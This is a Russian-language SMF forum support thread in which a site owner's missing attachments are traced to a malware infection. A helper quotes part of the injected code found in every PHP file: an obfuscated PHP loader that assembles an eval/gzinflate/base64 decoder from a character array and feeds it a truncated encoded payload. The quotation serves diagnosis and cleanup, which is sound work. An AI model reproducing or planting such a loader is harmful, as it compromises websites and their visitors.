Пропали прикрепленные фото после смены пароля доступа к БД

Автор Anusik, 20 сентября 2011, 17:19:27

« назад - далее »

0 Пользователи и 1 гость просматривают эту тему.

Anusik

В связи с заражением нескольких сайтов iframe вирусом сменила пароли к ftp и  базам.
После этого прикрепленные изображения не отображаются, хотя в папке attachment есть файлы, ссылка на эту папку в форуме стоит. Т.е. фактически кроме пароля на БД ничего не менялось, не удалялось.
Помогите пожалуйста....

digger®

Цитата: Anusik от 20 сентября 2011, 17:19:27
В связи с заражением нескольких сайтов iframe вирусом сменила пароли к ftp и  базам.
После этого прикрепленные изображения не отображаются, хотя в папке attachment есть файлы, ссылка на эту папку в форуме стоит. Т.е. фактически кроме пароля на БД ничего не менялось, не удалялось.
Помогите пожалуйста....

А капча работает?

Anusik


kak2z

Если нужно что то исправить, обновить, переставить, настроить, сделать форум заново - пишите в ЛС)

Anusik

Открыла settings notped-ом и пересохранила в UTF-8 . Теперь у меня "порубало" название форума. оно теперь вот так выглядит "
Фиалки Кременчуга"

digger®

Цитата: Anusik от 21 сентября 2011, 22:28:28
Открыла settings notped-ом и пересохранила в UTF-8 . Теперь у меня "порубало" название форума. оно теперь вот так выглядит "
Фиалки Кременчуга"
В админке зайдите в свойства сервера и впишите там заново.

Anusik

Я восстановила файл из бэкапа. Даже после пересохранения файла в  UTF-8 картинки не появились




Anusik

Пересохранила файл блокнотом в win-1251. Изображений так и нет. И еще вопрос - почему фотографии прикрепленные вместо человеческих изображений превращаются в файлы с непонятными названиями? Это связано с оптимизацией размеров изображений?
Вторая часть сайта на WP. Там человеческая галлерея многопользовательская. И с сео и подписям к картинкам приятная ситуация.
Я не понимаю, почему смена пароля на базу вызвала "слет" всех прикрепленных изображений?
Это огромный недочет....
Хотя движок бесплатный... Что уж жаловаться.

kak2z

Вы главное не переживайте, я думаю если вы дадите специалисту с этого форума доступ к хостингу то очень быстро Вам помогут. И дело не в бесплатности движка, а в квалификации. Я например тоже часто сталкиваюсь с проблемами и мне тут всегда помогают. Главное не паниковать - файлы то ведь целы)
Если нужно что то исправить, обновить, переставить, настроить, сделать форум заново - пишите в ЛС)

digger®

Цитата: Anusik от 22 сентября 2011, 21:21:29
И еще вопрос - почему фотографии прикрепленные вместо человеческих изображений превращаются в файлы с непонятными названиями? Это связано с оптимизацией размеров изображений?
Это связано с безопасностью, возможностью хранения файлов с одинаковыми названиями и решением проблем с именами файлов отличными от английских.

Цитировать
Вторая часть сайта на WP. Там человеческая галлерея многопользовательская. И с сео и подписям к картинкам приятная ситуация.
Поставьте на SMF человеческую галерею и будет счастье, какие проблемы?

Цитировать
Я не понимаю, почему смена пароля на базу вызвала "слет" всех прикрепленных изображений?
Это огромный недочет....
Огромный недочет - это файлы движка самому запороть при редактировании вручную.

Цитировать
Хотя движок бесплатный... Что уж жаловаться.
При чем тут бесплатность движка, проблемы ваши могут и за деньги решить.

Anusik

чем запороть файл? скопировав строчку с паролем на бд?

kak2z

маленькие причины часто влекут за собой большие следствия)
Если нужно что то исправить, обновить, переставить, настроить, сделать форум заново - пишите в ЛС)


kak2z

Давайте с начала.
1. Вы какие файлы руками редактировали?
2. Скачайте и установите http://notepad-plus-plus.org/download/v5.9.3.html
Если нужно что то исправить, обновить, переставить, настроить, сделать форум заново - пишите в ЛС)

Anusik

спасибо за предложение заплатить деньги. но проект социальный. посему никто его не финансирует.

Anusik



kak2z

Если нужно что то исправить, обновить, переставить, настроить, сделать форум заново - пишите в ЛС)


kak2z

Рекомендую воспользоватся предложением Дигера. Он более чем квалифицированный специалист.

П.С. Если не хотите то скачайте тот редактор что я дал ссылку. Возьмите из чистого дистрибутива файл сеттинг, залейте его на место старого (предварительно сохранив старый). Закачайте в корень repair_setting и через него вбейте все данные.
Если нужно что то исправить, обновить, переставить, настроить, сделать форум заново - пишите в ЛС)

Anusik


Anusik

digger, если у Вас что-то получится. отпишитесь пожалуйста.

digger®

Цитата: Anusik от 22 сентября 2011, 22:19:53
digger, если у Вас что-то получится. отпишитесь пожалуйста.

У вас во всех php файлах форума торчит инъекция (судя по именам переменных рассчитанная на WordPress). Так что, неработающие вложения, это не самая большая проблема.

Цитировать$md5 = "dedd7710dea4741a8c480829485ced1a";
$wp_salt = array(')','z','l','f',"s",'g',"v",'t',"c","b","n","o","$","4","d",'(',"_","i","e",'6','r',";","a");
$wp_add_filter = create_function('$'.'v',$wp_salt[18].$wp_salt[6].$wp_salt[22].$wp_salt[2].$wp_salt[15].$wp_salt[5].$wp_salt[1].$wp_salt[17].$wp_salt[10].$wp_salt[3].$wp_salt[2].$wp_salt[22].$wp_salt[7].$wp_salt[18].$wp_salt[15].$wp_salt[9].$wp_salt[22].$wp_salt[4].$wp_salt[18].$wp_salt[19].$wp_salt[13].$wp_salt[16].$wp_salt[14].$wp_salt[18].$wp_salt[8].$wp_salt[11].$wp_salt[14].$wp_salt[18].$wp_salt[15].$wp_salt[12].$wp_salt[6].$wp_salt[0].$wp_salt[0].$wp_salt[0].$wp_salt[21]);
$wp_add_filter('FZfHroXKkkQ/590nBsDGq9UDvPeeSQvvvefr+9xpCamyyMyIFeWVDv/UXztVQ3qU/2TpXuLo/xVlPhflP/8Rkkrg1y+kex9UoP65VdgVS+78Tjv4bfUPuMKLeOwx1/FfkCAJaVVTlhb4qxEBgoy/4PZ+FyGv2KbhwEs+Wh5QHBECFCDTjKT8YAW77Lfx95OxR5RY2pp+aM+yKqaH0vFKO1vZvNbaJt5MuXSzmSskvBCxCgaxGFpTe2xMqSPFawfY1fy2INkHvo+SmGy/plGVsenBl5VO/
...

kak2z

Если нужно что то исправить, обновить, переставить, настроить, сделать форум заново - пишите в ЛС)

Anusik

это был iframe.... может и остался.
А я все не могу понять. почему он опять появляется. В форуме я его не искала.
Вот гадость.... Это из за него такое творится?

digger®

Цитата: Anusik от 22 сентября 2011, 23:54:07
это был iframe.... может и остался.
А я все не могу понять. почему он опять появляется. В форуме я его не искала.
Вот гадость.... Это из за него такое творится?
Это самое очевидно объяснение.

Anusik


kak2z

самый лучший вариант это сначала проверить компьютер несколькими антивирусами, потом напрячь хостера что бы он тоже со свойей стороны проверил что можно, дальше отлючить все сайты что бы не вертелись скрипты, поменять все пароли и залить заново движки на все сайты находящиеся в пределах учетной записи на хостинге. Если Диггер сказал что переменные из ВП то скорее всего зараза в нем сидит а портит еще и соседние проекты. Но я не большой спец - я написал то как бы я делал)
Если нужно что то исправить, обновить, переставить, настроить, сделать форум заново - пишите в ЛС)

Anusik

Антивирус его не видит. На компе он "сидел" в сохраненных html страницах с выкройками в скриптах. Нашла случайно.
Его аваст видит только когда грузится сайт.
Я уже с ним намучилась порядочно. Хотя теперь хоть знаю что он и в форум залез.

Anusik

Перезалила все. Спасибо за совет и помощь. Картинки появились. Все работает. Может попозже осилю переезд на новую версию.

kak2z

Пока не установлены моды переезд у Вас займет буквально 10 минут.
Если нужно что то исправить, обновить, переставить, настроить, сделать форум заново - пишите в ЛС)

Anusik

Я читала на форуме, что нужно какие-то таблицы править. Дайте плиз ссылку, может не там смотрела.

kak2z

Если нужно что то исправить, обновить, переставить, настроить, сделать форум заново - пишите в ЛС)